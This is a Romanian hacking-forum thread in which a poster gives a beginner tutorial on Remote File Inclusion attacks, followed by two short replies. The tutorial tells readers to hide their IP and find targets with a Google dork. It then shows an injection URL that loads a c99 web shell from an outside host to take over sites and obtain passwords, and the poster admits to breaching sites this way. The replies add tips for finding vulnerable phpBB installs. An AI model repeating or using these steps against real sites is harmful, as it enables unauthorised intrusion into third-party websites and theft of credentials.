RSB_Team
Ne-am mutat pe http://forum.rsb-team.com
|
Nou pe simpatie: ionela24 pe Simpatie.ro
 | Femeie 24 ani Prahova cauta Barbat 25 - 47 ani |
|
|
RSB_TeamReguliInregistrareLoginPozeNu sunteti logat. Lista Forumurilor Pe Tematici
|
| #1 |
|
|
Code:
Tutorial made by DD_ram
| Bun Venit! Acesta este primul tutorial facut de mine si cel mai usor.
|- Avantaje: nu puteti fi prinsi dar pt. orice caz, va rog sa instalati urmatorul program.
|- Programe necesare
- | Hide Ip Platinum | - ascunderea IP-ului
- | Acunetix Web Vulnerability Scanner | - program de scanat vulnerabilitatile site-ului respectiv
- | shell c99 | - un micut shell
P.S: nu dau site-uri vulnerabile, va las pe voi sa cautati :P.
|-------------------------------------------------------------------------------------------------------------------------------------------------------/
! Atentie ! sunt necesare cateva cunostinte de PHP
Boon, am facut rost de programele necesare, e timpul sa ne apucam de treaba.
Pentru inceput RFI este o vulnerabilitate. Ea inseamna "Remote File Inclusion" (includerea fisierelor prin intermediul "telecomenzii" mai pe intelesul tuturor).
Un site vulnerabil la asa ceva nu se gaseste prea usor dar sa spunem ca l-am gasit. Daca nu, probabil va intrebati "CUM DRACU' IL GASIM?", ei bine, sa zicem de site-ul meu...www.prolithic.uv.ro ce are pagina index.php.
Ne uitam daca are dupa index.php urmatoarele index.php?pagina=RFI si incercam sa punem index.php?pagina=http://prolithic.uv.ro/c99.txt (adresa shell-ului). Daca nu merge, cautati un alt site vulnerabil, doar nu credeti
ca o sa cad de fraier sa imi spargeti site-ul :P. Cel mai bine e sa cautam pe google " inurl:index.php?pagina= " (cautati pe google fara ghilimele). Asta este cel mai bun si mai rapid mod de a gasi un site. (nu vreau sa spun)
ca ati luat Acunetix degeaba dar, cu Acunetix dureaza mult mai mult... dupa ce am gasit site-ul punem adresa shell-ului http://prolithic.uv.ro/c99.txt si vedem daca merge. Daca apare ii dam sa afle parola. Atata tot. Cel mai bine
e sa nu facem un deface (sa modificat o pagina a site-ului si sa o stricam), cel mai bine e sa trimitem un mail administratorului cu subiectul "Site-ul dumneavoastra (http://www.-------.com/ro) este vulnerabil la RFI (remote file inclusion)"
De la "Un Hacker Alb".
Atat. Astept pareri si comentarii la adresa mea de e-mail.
Al vostru DD_ram.
/End |
Nu intrebati daca am spart si yo site-uri cu RFI caci, da am spart. Shellutile nu merg, site-ul nu e inca activ.... 
_______________________________________ Tot ce mi se-ntampla pare sa treaca pe langa mine...Fara sa bag de seama totul trece asa cum vine...Si poate eu sunt de vina pentru tot ce mi se-ntampla...Stiu ca situatia mea acum nu-i asa de simplaLucruri pe care nu le vedeam acum ma obsedeaza...Si tot ce inainte-mi placea acum ma enerveaza...Si cateodata cad intr-o depresie totala.... p[i]o
|
|
| |
|
| #2 |
|
|
frate e fain ce ai scris tu acolo dar vreau sa zic ceva(sa nu iei in nume de rau):rfi cred ca sa mai postat inca vreo 2 sau 3 tutoriale si in al 2 lea rand toti stiu aceasta metoda dar degeaba ca rar mai gasesti cu google prin index.php?page= (gasesti ceva mai complex daca cauti cu vulnerabilitatea unui derivat de la php cum e phpBB care are si el mai multe vulnerabilitati rfi sau alte derivate)
|
|
| |
|
| #3 |
|
|
@$-Geo-$, stai linistit, yo nu iau nimic in nume de rau, ba dimpotriva, iau totul in ras... ca sa vezi daca un site e vulnerabil, daca ai un prg ceva ca sa vezi si codu sursa o sa vezi undeva comanda "GET"...de obicei unele site-uri suny facute cu comanda "POST"...deci daca are GET pagina nuj yo care atunci e vulnerabil,nu?
_______________________________________ Tot ce mi se-ntampla pare sa treaca pe langa mine...Fara sa bag de seama totul trece asa cum vine...Si poate eu sunt de vina pentru tot ce mi se-ntampla...Stiu ca situatia mea acum nu-i asa de simplaLucruri pe care nu le vedeam acum ma obsedeaza...Si tot ce inainte-mi placea acum ma enerveaza...Si cateodata cad intr-o depresie totala.... p[i]o
|
|
| |
|